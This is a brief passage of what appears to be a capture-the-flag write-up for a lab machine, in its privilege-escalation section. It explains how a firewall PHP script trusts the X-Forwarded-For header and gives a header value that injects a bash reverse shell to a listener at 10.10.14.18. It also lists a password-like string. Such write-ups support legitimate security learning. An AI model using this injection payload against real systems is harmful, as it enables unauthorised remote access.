Priv Esc

uhc-11qual-global-pw

View how firewall allowed us access to port 22

uhc@union:~$ cat /var/www/html/firewall.php

Breakdown

  1. If HTTP_X_FORWARDED_FOR is set

  2. Set $ip to its value

  3. Else

  4. Use REMOTE_ADDR for $ip

X-FORWARDED-FOR: ;bash -c 'bash -i >& /dev/tcp/10.10.14.18/4443 0>&1';
PreviousFootholdNextCredentials

Last updated

Was this helpful?